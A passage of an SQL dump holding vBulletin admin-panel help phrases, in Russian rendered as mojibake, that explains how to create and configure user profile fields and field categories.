', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23707, -1, 'profilefield_title', 'cphelptext', 'ÃŽ ïîëÿõ ïðîôèëÿ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23708, -1, 'profilefield_add_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå äîáàâèòü ïîëå ïðîôèëÿ ïîëüçîâàòåëÿ. Ãîëå ïðîôèëÿ ïîëüçîâàòåëÿ - ýòî ïîëå, êîòîðîå çàïîëíÿåò ïîëüçîâàòåëü ïðè ðåãèñòðàöèè (èëè ïîñëå, ïðè ðåäàêòèðîâàíèè ïðîôèëÿ), à çàòåì çíà÷åíèå îòîáðàæàåòñÿ â ðàçëè÷íûõ ìåñòàõ.', 'vbulletin', '', 0, ''), (23709, -1, 'profilefield_add_title', 'cphelptext', 'Äîáàâëåíèå ïîëÿ ïðîôèëÿ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (23710, -1, 'profilefield_add_profilefieldtype_text', 'cphelptext', 'Îïðåäåëÿåò, êàêîé òèï ýëåìåíòîâ HTML áóäåò èñïîëüçîâàòüñÿ äëÿ óêàçàíèÿ çíà÷åíèÿ äëÿ ýòîãî ïîëÿ.', 'vbulletin', 'zCarot', 1220959801, '3.8.0 Alpha 1'), (23711, -1, 'profilefield_add_profilefieldtype_title', 'cphelptext', 'Òèï ïîëÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1220959801, '3.8.0 Alpha 1'), (23712, -1, 'profilefield_add_edit_title_text', 'cphelptext', 'Ãòî íàçâàíèå ïîëÿ ïðîôèëÿ, êîòîðîå îòîáðàæàåòñÿ ïîëüçîâàòåëÿì è â ïàíåëè àäìèíèñòðàòîðà. Äëèíà çàãîëîâêà ìîæåò áûòü äî 50 ñèìâîëîâ.', 'vbulletin', '', 0, ''), (23713, -1, 'profilefield_add_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (23714, -1, 'profilefield_add_edit_description_text', 'cphelptext', 'Ãòî îïèñàíèå ïîëÿ, îòîáðàæàåìîãî ïîëüçîâàòåëÿì. Âàì ñëåäóåò îïèñàòü, äëÿ ÷åãî îíî òðåáóåòñÿ, îáÿçàòåëüíîå ýòî ïîëå èëè íåò, ëè÷íîå èëè íåò.', 'vbulletin', '', 0, ''), (23715, -1, 'profilefield_add_edit_description_title', 'cphelptext', 'Îïèñàíèå', 'vbulletin', '', 0, ''), (23716, -1, 'profilefield_add_edit_profilefieldcategoryid_text', 'cphelptext', 'Âû ìîæåòå ãðóïïèðîâàòü äîïîëíèòåëüíûå ïîëÿ ïðîôèëÿ ïî êàòåãîðèÿì. Îñíîâíàÿ öåëü ãðóïïèðîâêè - îòîáðàæåíèå ïóíêòîâ â ðàçíûõ âêëàäêàõ èëè áëîêàõ â ïðîôèëå (â äîïîëíåíèè ê îòîáðàæåíèþ âî âêëàäêå \"Îáî ìíå\").
\r\n
\r\n×òîáû óçíàòü îá ýòîì áîëüøå, ïî÷èòàéòå ïîìîùü ïî óïðàâëåíèþ êàòåãîðèÿìè ïîëåé ïðîôèëÿ.', 'vbulletin', 'zCarot', 1205937526, '3.7.0 Release Candidate 1'), (23717, -1, 'profilefield_add_edit_profilefieldcategoryid_title', 'cphelptext', 'Êàòåãîðèÿ ïîëÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1205937422, '3.7.0 Release Candidate 1'), (23718, -1, 'profilefield_add_edit_data_text', 'cphelptext', 'Ãîëÿ äëÿ âûáîðà
\r\nÑþäà ñëåäóåò ââåñòè êàæäîå çíà÷åíèå, êîòîðîå äîëæíî ïîÿâëÿòüñÿ êàê îïöèÿ. Óáåäèòåñü, ÷òî íàæàëè êëàâèøó \'Enter\' ïîñëå êàæäîé îïöèè, èëè ýòî áóäåò íåïðàâèëüíî ðàáîòàòü!
\r\n
\r\nÃîëÿ äëÿ ïåðåêëþ÷àòåëåé
\r\nÑþäà ñëåäóåò ââåñòè êàæäîå çíà÷åíèå, êîòîðîå äîëæíî ïîÿâëÿòüñÿ êàê ïåðåêëþ÷àòåëü. Óáåäèòåñü, ÷òî íàæàëè êëàâèøó \'Enter\' ïîñëå êàæäîé îïöèè, èëè ýòî áóäåò íåïðàâèëüíî ðàáîòàòü!
\r\n
\r\nÃîëÿ äëÿ ôëàæêîâ (checkboxes)
\r\nÑþäà ñëåäóåò ââåñòè êàæäîå çíà÷åíèå, êîòîðîå äîëæíî ïîÿâëÿòüñÿ êàê ôëàæîê. Óáåäèòåñü, ÷òî íàæàëè êëàâèøó \'Enter\' ïîñëå êàæäîé îïöèè, èëè ýòî áóäåò íåïðàâèëüíî ðàáîòàòü!!', 'vbulletin', '', 0, ''), (23719, -1, 'profilefield_add_edit_data_title', 'cphelptext', 'Ãîëÿ ñ âîçìîæíîñòüþ âûáîðà íåñêîëüêèõ', 'vbulletin', '', 0, ''), (23720, -1, 'profilefield_add_edit_maxlength_text', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ââîäèìîãî çíà÷åíèÿ (äëÿ òåêñòîâûõ ïîëåé)
\r\nÃòà îïöèÿ îïðåäåëÿåò, ñêîëüêî ñèìâîëîâ ìîæíî ââåñòè ïîëüçîâàòåëþ â ýòî ïîëå.
\r\n
\r\nÌàêñèìàëüíûé ðàçìåð ââîäèìîãî çíà÷åíèÿ (äëÿ ïîëåé ñ îäíîâàðèàíòíûì âûáîðîì, ôëàæêîâ è ïåðåêëþ÷àòåëåé)
\r\nÃòà îïöèÿ îïðåäåëÿåò ñêîëüêî ñèìâîëîâ ìîæåò ââåñòè ïîëüçîâàòåëü â äîïîëíèòåëüíîì ïîëå.', 'vbulletin', '', 0, ''), (23721, -1, 'profilefield_add_edit_maxlength_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ââîäèìîãî çíà÷åíèÿ', 'vbulletin', '', 0, ''), (23722, -1, 'profilefield_add_edit_size_text', 'cphelptext', 'Ãàçìåð ïîëÿ (äëÿ òåêñòîâûõ ïîëåé)
\r\nÇäåñü óêàçûâàåòñÿ ðàçìåð ïîëÿ â ñèìâîëàõ. Ãòî çíà÷åíèå äîëæíî áûòü ìåíüøå èëè ðàâíûì ìàêñèìàëüíîìó êîëè÷åñòâó ñèìâîëîâ, ïîçâîëåííîìó ââåñòè â ýòî ïîëå.
\r\n
\r\nÃàçìåð ïîëÿ (äëÿ ïîëåé ñ îäíîâàðèàíòíûì âûáîðîì, ôëàæêîâ è ïåðåêëþ÷àòåëåé)
\r\nÃòîò ïàðàìåòð îïðåäåëÿåò ðàçìåð ïîëÿ äëÿ ââîäà â ñèìâîëàõ. Ãåêîìåíäóåòñÿ, ÷òîáû ýòî çíà÷åíèå áûëî ìåíüøèì èëè ðàâíûì ìàêñèìàëüíîìó êîëè÷åñòâó ñèìâîëîâ, ïîçâîëåííîìó ââåñòè â ýòî ïîëå.
\r\n
\r\nÎãðàíè÷åíèå âûáîðà (äëÿ ïîëåé ñ ìíîãîâàðèàíòíûì âûáîðîì)
\r\nÃòîò ïàðàìåòð îïðåäåëÿåò, ñêîëüêî îïöèé ìîæåò âûáðàòü ïîëüçîâàòåëü. Óêàæèòå çäåñü 0, ÷òîáû ïîëüçîâàòåëü ñìîã âûáðàòü âñå îïöèè.
\r\n
\r\nÎãðàíè÷åíèå âûáîðà (äëÿ ôëàæêîâ)
\r\nÃòîò ïàðàìåòð îïðåäåëÿåò, ñêîëüêî ôëàæêîâ ìîæåò ïîñòàâèòü ïîëüçîâàòåëü â ýòîì ïîëå. Ââåäèòå 0, ÷òîáû ïîëüçîâàòåëü ñìîã îòìåòèòü âñå îïöèè.', 'vbulletin', '', 0, ''), (23723, -1, 'profilefield_add_edit_size_title', 'cphelptext', 'Ãàçìåð ïîëåé è îãðàíè÷åíèå âûáîðà', 'vbulletin', '', 0, ''), (23724, -1, 'profilefield_add_edit_newtype_text', 'cphelptext', 'Âûáåðèòå òèï ïîëÿ äëÿ ýòîãî ïîëÿ ïðîôèëÿ. Ãîæàëóéñòà, èçó÷èòå îñíîâíûå ñïðàâî÷íûå ñòàòüè, ÷òîáû áîëåå ïîäðîáíî óçíàòü î êàæäîì ïîëå ïðîôèëÿ.', 'vbulletin', '', 0, ''), (23725, -1, 'profilefield_add_edit_newtype_title', 'cphelptext', 'Òèï ïîëÿ ïðîôèëÿ', 'vbulletin', '', 0, ''), (23726, -1, 'profilefield_add_edit_height_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò êîëè÷åñòâî ñòðîê, êîòîðûå äîëæíû áûòü äîñòóïíû äëÿ ââîäà â òåêñòîâîì ïîëå. Ìû ðåêîìåíäóåì óñòàíîâèòü çäåñü õîòÿ áû 2 äëÿ óäîáñòâà ïîëüçîâàòåëÿ.
\r\nÃòî ïðèìåíèìî òîëüêî äëÿ ìíîãîñòðî÷íûõ òåêñòîâûõ ïîëåé', 'vbulletin', 'zCarot', 1152785567, '3.6.0 Release Candidate 2'), (23727, -1, 'profilefield_add_edit_height_title', 'cphelptext', 'Âûñîòà ìíîãîñòðî÷íîãî òåêñòîâîãî ïîëÿ', 'vbulletin', '', 0, ''), (23728, -1, 'profilefield_add_edit_def_text', 'cphelptext', 'Ãîëÿ äëÿ âûáîðà
\r\nÅñëè âû æåëàåòå, ÷òîáû ïåðâàÿ îïöèÿ ñòàëà îïöèåé ïî óìîë÷àíèþ â ýòîì ïîëå, òî âûáåðèòå çäåñü \"Äà\".  ïðîòèâíîì ñëó÷àå âûáîð ïî óìîë÷àíèþ áóäåò îòñóòñòâîâàòü. Ãòî ïîëåçíî äëÿ òîãî, ÷òîáû çàñòàâèòü ïîëüçîâàòåëåé âûáðàòü îäíî èç çíà÷åíèé ïðè ðåãèñòðàöèè, åñëè ýòî îáÿçàòåëüíîå ïîëå.
\r\n
\r\nÃîëÿ äëÿ ïåðåêëþ÷àòåëåé
\r\nÅñëè \"Äà\", òî ïåðâûé ïåðåêëþ÷àòåëü èçíà÷àëüíî áóäåò âûáðàí.  ïðîòèâíîì ñëó÷àå ïðåäóñòàíîâëåííîãî âûáîðà íå áóäåò. Ãòî ïîëåçíî â òîì ñëó÷àå, åñëè âû æåëàåòå, ÷òîáû ïîëüçîâàòåëü ñàìîñòîÿòåëüíî âûáðàë îäèí èç ïåðåêëþ÷àòåëåé, åñëè ýòî îáÿçàòåëüíîå ïîëå.', 'vbulletin', '', 0, ''), (23729, -1, 'profilefield_add_edit_def_title', 'cphelptext', 'Ãî óìîë÷àíèþ', 'vbulletin', '', 0, ''), (23730, -1, 'profilefield_add_edit_perline_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò, ñêîëüêî âàðèàíòîâ îòîáðàæàåòñÿ íà îäíîé ñòðîêå. Åñëè âû óêàæèòå çäåñü 0, òî âñå âàðèàíòû áóäóò îòîáðàæåíû íà îäíîé ñòðîêå.', 'vbulletin', 'zCarot', 1199998638, '3.7.0 Beta 4'), (23731, -1, 'profilefield_add_edit_perline_title', 'cphelptext', 'Ãëåìåíòîâ íà ñòðîêó (òîëüêî äëÿ ïåðåêëþ÷àòåëåé è ôëàæêîâ)', 'vbulletin', 'zCarot', 1147805177, '3.6.0 Beta 1'), (23732, -1, 'profilefield_add_edit_boxheight_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò, êàêîé âûñîòû äîëæíî áûòü ïîëå. Åñëè ó âàñ 12 îïöèé, è âû æåëàåòå, ÷òîáû õîòÿ áû 3 èç íèõ îòîáðàæàëèñü áåç ïîëîñû ïðîêðóòêè, òî óñòàíîâèòå çäåñü 3. Ãåêîìåíäóåòñÿ óñòàíîâèòü çäåñü êàê ìèíèìóì 3, ÷òîáû ïîëüçîâàòåëÿì áûëî óäîáíåå.', 'vbulletin', '', 0, ''), (23733, -1, 'profilefield_add_edit_boxheight_title', 'cphelptext', 'Âûñîòà ïîëÿ (òîëüêî äëÿ ìíîãîâàðèàíòíîãî âûáîðà)', 'vbulletin', '', 0, ''), (23734, -1, 'profilefield_add_edit_displayorder_text', 'cphelptext', 'Çäåñü óêàçûâàåòñÿ ïîðÿäîê, â êîòîðîì áóäåò îòîáðàæàòüñÿ ïîëå. Ãî óìîë÷àíèþ ïîëå áóäåò äîáàâëåíî ïîñëåäíèì. Ãîðÿäîê îòîáðàæåíèÿ íà÷èíàåòñÿ ñ 1 è ìîæåò áûòü ëþáûì öåëûì ïîëîæèòåëüíûì ÷èñëîì.', 'vbulletin', '', 0, ''), (23735, -1, 'profilefield_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðàæåíèÿ ïî', 'vbulletin', '', 0, ''), (23736, -1, 'profilefield_add_edit_required_text', 'cphelptext', 'Äà, ïðè ðåãèñòðàöèè è îáíîâëåíèè ïðîôèëÿ - ïîëüçîâàòåëü äîëæåí áóäåò çàïîëíèòü ýòî ïîëå ïðè ðåãèñòðàöèè è ëþáîì îáíîâëåíèè ïðîôèëÿ.
\r\n
\r\nÄà, âñåãäà - ïîëüçîâàòåëü äîëæåí áóäåò çàïîëíèòü ýòî ïîëå ïðè ðåãèñòðàöèè. Åñëè âûáðàí ýòîò âàðèàíò, òî óæå çàðåãèñòðèðîâàííûå ïîëüçîâàòåëè îáÿçàíû áóäóò çàïîëíèòü äàííîå ïîëå, ïåðåä òåì êàê ïðîäîëæèòü èñïîëüçîâàòü âàø ôîðóì. Ãòî çíà÷åíèå áóäåò ïðèìåíÿòüñÿ, òîëüêî åñëè ïîëå áóäåò îòîáðàæàòüñÿ íà ñòðàíèöå \"Ãåäàêòèðîâàòü äàííûå\".
\r\n
\r\nÃåò - çàïîëíåíèå äàííîãî ïîëÿ íå îáÿçàòåëüíî.
\r\n
\r\nÃåò, íî ïîêàçûâàòü ïðè ðåãèñòðàöèè - çàïîëíåíèå äàííîãî ïîëÿ íå îáÿçàòåëüíî, íî îíî áóäåò îòîáðàæàòüñÿ ïðè ðåãèñòðàöèè.', 'vbulletin', 'zCarot', 1214221606, '3.8.0 Alpha 1'), (23737, -1, 'profilefield_add_edit_required_title', 'cphelptext', 'Îáÿçàòåëüíîå ïîëå', 'vbulletin', '', 0, ''), (23738, -1, 'profilefield_add_edit_editable_text', 'cphelptext', 'Äà - ïîëüçîâàòåëü ñìîæåò îòðåäàêòèðîâàòü äàííîå ïîëå â ëþáîå âðåìÿ.
\r\n
\r\nÃåò - ïîëüçîâàòåëü íå ñìîæåò îòðåäàêòèðîâàòü ýòî ïîëå.
\r\n
\r\nÒîëüêî ïðè ðåãèñòðàöèè - ïîëüçîâàòåëü ñìîæåò îòðåäàêòèðîâàòü ýòî ïîëå òîëüêî ïðè ðåãèñòðàöèè èëè åñëè îíî òðåáóåò çàïîëíåíèÿ è ïðè ýòîì åù¸ íå çàïîëíåíî.', 'vbulletin', 'zCarot', 1147803250, '3.6.0 Beta 1'), (23739, -1, 'profilefield_add_edit_editable_title', 'cphelptext', 'Äîñòóïíî äëÿ ðåäàêòèðîâàíèÿ ïîëüçîâàòåëåì', 'vbulletin', '', 0, ''), (23740, -1, 'profilefield_add_edit_hidden_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëå ìîæåò áûòü çàïîëíåíî ïîëüçîâàòåëåì, íî âèäèìî îíî áóäåò òîëüêî òåì, ó êîãî åñòü ïðàâà íà óðîâíå ãðóïïû ïîëüçîâàòåëåé íà ïðîñìîòð ëè÷íûõ ïîëåé.', 'vbulletin', '', 0, ''), (23741, -1, 'profilefield_add_edit_hidden_title', 'cphelptext', 'Ëè÷íîå ïîëå', 'vbulletin', '', 0, ''), (23742, -1, 'profilefield_add_edit_searchable_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâàòåëè íå ñìîãóò âûïîëíÿòü ðàñøèðåííûé ïîèñê ïî ýòîìó ïîëþ â ñïèñêå ó÷àñòíèêîâ. Åñëè âû óêàçàëè, ÷òî ïîëå ëè÷íîå, òî òîëüêî ïîëüçîâàòåëè ñ ïðàâàìè íà óðîâíå ãðóïïû ñìîãóò èñêàòü åãî.', 'vbulletin', '', 0, ''), (23743, -1, 'profilefield_add_edit_searchable_title', 'cphelptext', 'Ãîëå äîñòóïíî äëÿ ïîèñêà ïî ñïèñêó ó÷àñòíèêîâ', 'vbulletin', '', 0, ''), (23744, -1, 'profilefield_add_edit_memberlist_text', 'cphelptext', 'Åñëè \"Äà\", òî çíà÷åíèå ïîëÿ áóäåò îòîáðàæàòüñÿ â ñïèñêå ó÷àñòíèêîâ ó êàæäîãî ïîëüçîâàòåëÿ. Åñëè âû óêàçàëè, ÷òî ïîëå ñêðûòî, òî òîëüêî àäìèíèñòðàòîðû è ìîäåðàòîðû ñìîãóò óâèäåòü çíà÷åíèå ýòîãî ïîëÿ â ñïèñêå ó÷àñòíèêîâ.', 'vbulletin', '', 0, ''), (23745, -1, 'profilefield_add_edit_memberlist_title', 'cphelptext', 'Îòîáðàæàòü â ñïèñêå ó÷àñòíèêîâ?', 'vbulletin', '', 0, ''), (23746, -1, 'profilefield_add_edit_optional_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëþ áóäåò ðàçðåøåíî çàïîëíèòü òåêñòîâîå ïîëå, êàê àëüòåðíàòèâíûé âàðèàíò îïöèÿì, óêàçàííûì äëÿ ýòîãî ïîëÿ.', 'vbulletin', '', 0, ''), (23747, -1, 'profilefield_add_edit_optional_title', 'cphelptext', 'Ãàçðåøèòü äîïîëíèòåëüíûå ïîëÿ (òîëüêî äëÿ ïîëåé âûáîðà è ïåðåêëþ÷àòåëåé)', 'vbulletin', '', 0, ''), (23748, -1, 'profilefield_add_edit_regex_text', 'cphelptext', 'Âû ìîæåòå òðåáîâàòü, ÷òîáû çíà÷åíèå ïîëÿ ñîîòâåòñòâîâàëî ðåãóëÿðíîìó âûðàæåíèþ PCRE-òèïà. Ãàïðèìåð, ïîëå ñîäåðæèò íîìåð ICQ ïîëüçîâàòåëÿ. Òàê êàê íîìåðà ICQ ñîäåðæàò òîëüêî ÷èñëà, òî âàì ñëåäóåò çàïèñàòü ðåãóëÿðíîå âûðàæåíèå íà ïðîâåðêó ââîäà íå ÷èñåë.\r\n

\r\nÃàïðèìåð (íå íà÷èíàéòå è íå çàêàí÷èâàéòå âûðàæåíèå ñèìâîëîì ïåðåõîäà):
\r\n
\r\n^[0-9]{7,8}$
\r\n
\r\nÅñëè âû äîïóñêàåòå, ÷òî ïîëå ìîæåò áûòü ïóñòûì, òî âàì ñëåäóåò èñïîëüçîâàòü:
\r\n
\r\n^[0-9]{7,8}$|^$
\r\n
\r\nÑì. PHP.net äëÿ ïîèñêà áîëüøåé èíôîðìàöèè î ðåãóëÿðíûõ âûðàæåíèÿõ.', 'vbulletin', 'zCarot', 1161192426, '3.6.3'), (23749, -1, 'profilefield_add_edit_regex_title', 'cphelptext', 'Ãåãóëÿðíîå âûðàæåíèå (òîëüêî äëÿ ïîëåé âûáîðà, òåêñòîâûõ ïîëåé è ïåðåêëþ÷àòåëåé)', 'vbulletin', '', 0, ''), (23750, -1, 'profilefield_add_edit_form_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò, íà êàêîé ñòðàíèöå áóäåò îòîáðàæàòüñÿ ïîëå ïðîôèëÿ.  áîëüøèíñòâå ñëó÷àåâ âû ïîæåëàåòå îñòàâèòü çäåñü \"Ãåäàêòèðîâàòü äàííûå\", íî âû òàêæå ìîæåòå ïîæåëàòü ñîçäàòü ñîáñòâåííûå îïöèè, êîòîðûìè ìîæíî áóäåò óïðàâëÿòü ÷åðåç óñëîâèÿ â øàáëîíàõ, òîãäà âûáåðèòå \"Îïöèè\". Ãòî ïîëå ïîÿâèòñÿ íà ñòðàíèöå \"Îïöèè\" ïàíåëè ïîëüçîâàòåëÿ. Òàêæå ýòî ïîëå íå áóäåò ïîÿâëÿòüñÿ ïðè ïðîñìîòðå ïðîôèëÿ ïîëüçîâàòåëÿ.

\r\n\r\nÊàê óæå óïîìèíàëîñü, âû ìîæåòå èñïîëüçîâàòü óñëîâèÿ â øàáëîíàõ, ÷òîáû äîáàâèòü äîïîëíèòåëüíûå îïöèè äëÿ âàøèõ ïîëüçîâàòåëåé. Ãàïðèìåð, âû ìîæåòå ñäåëàòü ýòî ïîëå ïðîôèëÿ ïîëåì âûáîðà èç îäíîãî ýëåìåíòà ïîä îäíîé èç êàòåãîðèé îïöèé. Çàòåì âû ìîæåòå èñïîëüçîâàòü ýòî ïîëå êàê óñëîâèå îòîáðàæåíèÿ ÷åãî-íèáóäü â øàáëîíå ÷àñòåé ñîîáùåíèé. Åñëè \"Ãàçâàíèå\" ýòîãî ïîëÿ ïðîôèëÿ field1, òî âû ìîæåòå èñïîëüçîâàòü ýòîò êîä â ñâîèõ øàáëîíàõ:

\r\n\r\n<if condition=\"$post[\'field1\']\">
\r\nêîä îòîáðàæåíèÿ, åñëè ïîëüçîâàòåëü îòìåòèë ýòî ïîëå ïðîôèëÿ
\r\n</if>


\r\n\r\nÊîä â ñåðåäèíå green îòîáðàçèòñÿ, òîëüêî åñëè ïîëüçîâàòåëü îòìåòèë ñîîòâåòñòâóþùåå ïîëå ïðîôèëÿ â ñâîèõ îïöèÿõ.', 'vbulletin', 'zCarot', 1201688570, '3.7.0 Beta 5'), (23751, -1, 'profilefield_add_edit_form_title', 'cphelptext', 'Ñòðàíèöà, îòîáðàæàåìàÿ ýòó îïöèþ', 'vbulletin', '', 0, ''), (23752, -1, 'profilefield_edit_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå îòðåäàêòèðîâàòü îäíî èç ïîëåé ïðîôèëÿ ïîëüçîâàòåëÿ. Ãîëå ïðîôèëÿ ïîëüçîâàòåëÿ - ýòî ïîëå, êîòîðîå çàïîëíÿåò ïîëüçîâàòåëü ïðè ðåãèñòðàöèè (èëè ïîñëå, ïðè ðåäàêòèðîâàíèè ïðîôèëÿ), à çàòåì çíà÷åíèå îòîáðàæàåòñÿ â ðàçëè÷íûõ ìåñòàõ.', 'vbulletin', '', 0, ''), (23753, -1, 'profilefield_edit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå ïîëåé ïðîôèëÿ', 'vbulletin', '', 0, ''), (23754, -1, 'profilefield_editcat_text', 'cphelptext', 'Âû ìîæåòå ãðóïïèðîâàòü äîïîëíèòåëüíûå ïîëÿ ïðîôèëÿ ïî êàòåãîðèÿì. Îñíîâíàÿ öåëü ãðóïïèðîâêè - îòîáðàæåíèå ïóíêòîâ â ðàçíûõ âêëàäêàõ èëè áëîêàõ â ïðîôèëå (â äîïîëíåíèè ê îòîáðàæåíèþ âî âêëàäêå \"Îáî ìíå\").', 'vbulletin', 'zCarot', 1205936925, '3.7.0 Release Candidate 1'), (23755, -1, 'profilefield_editcat_title', 'cphelptext', 'Óïðàâëåíèå êàòåãîðèÿìè äîïîëíèòåëüíûõ ïîëåé ïðîôèëÿ', 'vbulletin', 'zCarot', 1205936925, '3.7.0 Release Candidate 1'), (23756, -1, 'profilefield_editcat_allowprivacy_text', 'cphelptext', 'Îïðåäåëÿåò, ïîÿâèòñÿ ëè ýòà êàòåãîðèÿ íà ñòðàíèöå íàñòðîåê êîíôèäåíöèàëüíîñòè ïðîôèëÿ, ïîçâîëÿÿ ñêðûòü ýòó êàòåãîðèþ îò äðóãèõ ïîëüçîâàòåëåé.', 'vbulletin', 'zCarot', 1215167628, '3.8.0 Alpha 1'), (23757, -1, 'profilefield_editcat_allowprivacy_title', 'cphelptext', 'Ãàçðåøèòü íàñòðîéêè êîíôèäåíöèàëüíîñòè', 'vbulletin', 'zCarot', 1218102521, '3.8.0 Alpha 1'), (23758, -1, 'profilefield_editcat_title_text', 'cphelptext', 'Ââåäèòå çàãîëîâîê êàòåãîðèè äîïîëíèòåëüíûõ ïîëåé ïðîôèëÿ. Ãòîò çàãîëîâîê áóäåò îòîáðàæàòüñÿ ïîëüçîâàòåëÿì. ÃÃ¥ èñïîëüçóéòå HTML êîä.', 'vbulletin', 'zCarot', 1205936976, '3.7.0 Release Candidate 1'), (23759, -1, 'profilefield_editcat_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', 'zCarot', 1205936976, '3.7.0 Release Candidate 1'), (23760, -1, 'profilefield_editcat_desc_text', 'cphelptext', 'Ââåäèòå îïèñàíèå êàòåãîðèè äîïîëíèòåëüíûõ ïîëåé ïðîôèëÿ. Ãòà èíôîðìàöèÿ áóäåò îòîáðàæåíà ïîä íàçâàíèåì êàòåãîðèè âî âêëàäêå ïðîôèëÿ \"Îáî ìíå\".', 'vbulletin', 'zCarot', 1205937083, '3.7.0 Release Candidate 1'), (23761, -1, 'profilefield_editcat_desc_title', 'cphelptext', 'Îïèñàíèå', 'vbulletin', 'zCarot', 1205937083, '3.7.0 Release Candidate 1'), (23762, -1, 'profilefield_editcat_location_text', 'cphelptext', '

Ãòîò ïàðàìåòð ïîçâîëÿåò óêàçàòü ìåñòà â ïðîôèëå, íà êîòîðûõ áóäóò îòîáðàæàòüñÿ äîïîëíèòåëüíûå ïîëÿ ýòîé êàòåãîðèè.

\r\n\r\n

Âû ìîæåòå âûáðàòü èç íåñêîëüêèõ âàðèàíòîâ, òàêèõ êàê îòîáðàæåíèå â âèäå íîâîé âêëàäêè, ëèáî â êîëîíêå ðÿäîì ñ âêëàäêàìè.

', 'vbulletin', 'zCarot', 1205937185, '3.7.0 Release Candidate 1'), (23763, -1, 'profilefield_editcat_location_title', 'cphelptext', 'Ìåñòîïîëîæåíèå â ïðîôèëå', 'vbulletin', 'zCarot', 1205937185, '3.7.0 Release Candidate 1'), (23764, -1, 'profilefield_editcat_displayorder_text', 'cphelptext', 'Ãòîò ïàðàìåòð îïðåäåëÿåò ìåñòîïîëîæåíèå ýòîé êàòåãîðèè, îòíîñèòåëüíî äðóãèõ. Êàòåãîðèè ñ áîëåå âûñîêèì ïîðÿäêîì îòîáðàæåíèÿ áóäóò íàõîäèòüñÿ ïåðåä êàòåãîðèÿìè ñ áîëåå íèçêèì ïîðÿäêîì îòîáðàæåíèÿ.', 'vbulletin', 'zCarot', 1205937243, '3.7.0 Release Candidate 1'), (23765, -1, 'profilefield_editcat_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðàæåíèÿ', 'vbulletin', 'zCarot', 1205937243, '3.7.0 Release Candidate 1'), (23766, -1, 'profilefield_modify_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå óïðàâëÿòü âàøèìè ïîëÿìè ïðîôèëåé ïîëüçîâàòåëåé. Ãîëÿ ïðîôèëåé ïîëüçîâàòåëåé ñîäåðæàò â ñåáå èíôîðìàöèþ è íàñòðîéêè âàøèõ ïîëüçîâàòåëåé.

\r\n\r\nÃàæìèòå íà ññûëêó \"Ãåäàêòèðîâàòü\", ÷òîáû îòðåäàêòèðîâàòü íàñòðîéêè ñîîòâåòñòâóþùåãî ïîëÿ ïðîôèëÿ. Ãàæìèòå íà ññûëêó \"Óäàëèòü\" äëÿ óäàëåíèÿ ïîëÿ ïðîôèëÿ (òàêæå óäàëèòñÿ ââåä¸ííàÿ ïîëüçîâàòåëÿìè èíôîðìàöèÿ).

\r\n\r\nÃîëÿ ïðîôèëÿ ïîëüçîâàòåëåé îòîáðàæàþòñÿ âìåñòå ñ ñîîáùåíèÿìè, ðÿäîì ñ èìåíåì àâòîðà. Åñëè âû æåëàåòå îòîáðàæàòü ïîëÿ ïðîôèëÿ â ñîîáùåíèÿõ, òî âàì ñëåäóåò îòðåäàêòèðîâàòü âàø øàáëîí postbit èëè postbit_legacy (â çàâèñèìîñòè îò âûáîðà âåðòèêàëüíîãî èëè ãîðèçîíòàëüíîãî îòîáðàæåíèÿ â âàøèõ îñíîâíûõ íàñòðîéêàõ) è äîáàâèòü $post[fieldX], ãäå X - ID ïîëÿ ïðîôèëÿ, îòîáðàæàåìîãî â êîëîíêå \"Èìÿ\" íà ýòîé ñòðàíèöå.

\r\n\r\nÃèæå íàõîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ïîëåé ïðîôèëÿ. Êîëîíêà \"Çàãîëîâîê / Òèï ïîëÿ ïðîôèëÿ\" ñîîáùèò âàì î íàçâàíèè è òèïå ïîëÿ ïðîôèëÿ. Ãîæàëóéñòà, èçó÷èòå îñíîâíûå ñïðàâî÷íûå ñòàòüè, ÷òîáû áîëåå ïîäðîáíî óçíàòü î êàæäîì èç òèïîâ ïîëåé ïðîôèëÿ.

\r\n\r\nÊîëîíêà \"Îïöèè\" ñîäåðæèò â ñåáå îïöèè, âêëþ÷¸ííûå äëÿ ñîîòâåòñòâóþùåãî ïîëÿ. Ãîëÿ ïðîôèëÿ ìîãóò áûòü îáÿçàòåëüíûìè, ðåäàêòèðóåìûìè, ëè÷íûìè, äîñòóïíûìè äëÿ ïîèñêà è îòîáðàæàåìûìè â ñïèñêå ó÷àñòíèêîâ, à ìîãóò è íå áûòü ;) .

\r\n\r\nÊîëîíêà \"Ãàçâàíèå\" ñîäåðæèò íîìåð ñîîòâåòñòâóþùåãî ïîëÿ. Âû ìîæåòå èñïîëüçîâàòü íîìåð ïîëÿ ïðîôèëÿ, ÷òîáû îòîáðàæàòü èõ â ñîîáùåíèÿõ (ñì. âûøå).

